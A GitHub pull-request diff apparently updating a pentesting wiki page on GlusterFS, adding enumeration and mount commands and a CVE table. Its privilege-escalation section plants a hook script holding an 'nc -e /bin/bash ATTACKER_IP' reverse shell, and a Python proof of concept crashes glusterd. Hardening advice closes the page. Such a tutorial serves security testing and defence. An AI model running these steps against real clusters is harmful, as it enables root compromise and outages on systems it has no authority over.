Skip to content

Research Update Enhanced src/network-services-pentesting/240... #1229

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Aug 4, 2025
+107 βˆ’19
Merged

Research Update Enhanced src/network-services-pentesting/240... #1229

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
126 changes: 107 additions & 19 deletions src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -4,41 +4,129 @@

## Basic Information

**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers.

**Default ports**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (onwards)\
For the port 49152, ports incremented by 1 need to be open to use more bricks. _Previously the port 24009 was used instead of 49152._
**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and instructs data-plane bricks that start at **49152/TCP** (one port per brick, incrementing). Versions prior to 9.x used **24008–24009/TCP** for brick transport, so you will still encounter those ports in legacy clusters.

```
PORT STATE SERVICE
24007/tcp open rpcbind
49152/tcp open ssl/unknown
PORT STATE SERVICE VERSION
24007/tcp open glusterd GlusterFS (RPC)
49152/tcp open gluster-brick SSL (TLS optional)
```

> Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures.

## Enumeration

To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`).
Install the client utilities on your attacking box:

```bash
sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu
```

To list and mount the available volumes you can use:
1. **Peer discovery & health**

```bash
sudo gluster --remote-host=10.10.11.131 volume list
# This will return the name of the volumes
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```

2. **Volume reconnaissance**

sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```

If you receive an **error trying to mount the filesystem**, you can check the logs in `/var/log/glusterfs/`
3. **Mount without privileges**

**Errors mentioning certificates** can be fixed by stealing the files (if you have access to the system):
```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```

- /etc/ssl/glusterfs.ca
- /etc/ssl/glusterfs.key
- /etc/ssl/glusterfs.ca.pem
If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side. Common issues are:

And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a different directory is used check for lines similar to: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in the logs) .
* TLS enforcement (`option transport.socket.ssl on`)
* Address based access control (`option auth.allow <cidr>`)

{{#include ../banners/hacktricks-training.md}}
### Certificate troubleshooting

Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log):

```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```

---

## Known Vulnerabilities (2022-2025)

| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **DoS** and probable RCE. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. |

> Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades.

### Exploiting `gluster_shared_storage` (Privilege Escalation)

Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with **root** on every node.

```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```

If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version.

### Denial-of-Service PoC (CVE-2023-26253)

```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
s.send(p.get_buffer())
```
Running the script crashes `glusterfsd` < 11.0.

---

## Hardening & Detection

* **Upgrade** – current LTS is 11.1 (July 2025). All CVEs above are fixed.
* Enable **TLS** for every brick:

```bash
gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
```
* Restrict clients with CIDR lists:

```bash
gluster volume set <vol> auth.allow 10.0.0.0/24
```
* Expose management port 24007 only on a **private VLAN** or through SSH tunnels.
* Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set <vol> features.audit-log on`).

---



## References

* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
{{#include ../banners/hacktricks-training.md}}